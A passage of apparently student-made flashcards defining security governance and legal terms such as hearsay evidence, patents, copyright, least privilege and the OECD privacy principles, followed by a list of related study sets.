attempting to pass off a product as if it were the original branded product.

Hearsay Evidence

constitutes second-hand evidence. As opposed to direct evidence, which someone has witnessed with her five senses, involves indirect information. Generally inadmissable defined by Rule 802. Business and computer generated records are generally considered hearsay evidence.

Privacy Act of 1974

created to codify protection of US citizens' data that is being used by the federal government. Act defined guidelines regarding how US citizens' PII would be used, collected, and distributed

Intellectual Property Law

intangible property that resulted from a creative act. Control the use of intangible property that can often be trivial to reproduce or abuse once made public or known.

Non-repudiation

means a user cannot deny(repudiate) having performed a transaction. Combination of authentication, and integrity. Non-repudiation authenticates the identity of a user and ensures the integrity.

Least Privilege

means users should be granted the minimum amount of access (authorization) required to do their jobs, but no more.

Patent

provide monopoly to the patent holder on the right to use, make , or sell an invention for a period of time in exchange for the patent holder's making the invention public.

Financial Damages: Compensatory

provide the victim with a financial award in effort to compensate for the loss or injury incurred as a direct result of the wrongdoing.

Due Care

provides a framework that helps to define minimum standard of protection that business stakeholders must attempt to achieve.

Corroborative Evidence

provides additional support for a fact that might have been called into question.

Financial Damages: Punitive

punish an individual or organization. Damages are typically awarded to attempt to discourage a particularly egregious violation where the compensatory and statutory damages alone would not act as a deterrent.

Copyright

represents a type of intellectual property that protects the form of expression in artistic,musical, or literary works, and is typically denoted by the circle c symbol as shown. Purpose to preclude unauthorized duplication, distribution, modification. (70 years)

Transborder Flows of Personal Data(1980)

requires that a citizen's personal data flow between companies based in divergent regions.

Authorization

the actions you can perform on system once you have been identified and authenticated. Actions i.e. reading, writing, executing files or programs.

Total Cost of Ownership

the cost of a safeguard

Annualized Loss Expectancy(ALE)

the cost of loss due to a risk over a year

Accountability Principle

the entity using the personal data should be accountable for adhering to the principles above.

Openness Principle

the general policy concerning collection and use of personal data should be readily available

Civil Law

the most common of the major legal systems. judicial precedents and particular case rulings do not carry the weight they do under common law.

Purpose Specification Principle

the purpose for the data collection should be known, and the subsequent use of the data should be limited to the purposes outlined at the time of collection.


Ensembles d'études connexes

AOM: TG Ch. 5: Head, Neck, and Face Muscles and Bones Review

View Set

Mathematics 800 Fundamentals - Unit 5: More With Functions DISTRIBUTIVE PROPERTY

View Set

Psychology Midterm Study Guide Chapter 4

View Set

Chapter 3 digestion, absorption...

View Set

Chapter 3: Quantitive demand analysis

View Set

Physics II Module of the MCAT Self Prep eCourse: Lesson 8: Reflection (Pro)

View Set

Test chapter 4 help in Accounting(#1-12 is true or false, the rest are questions)

View Set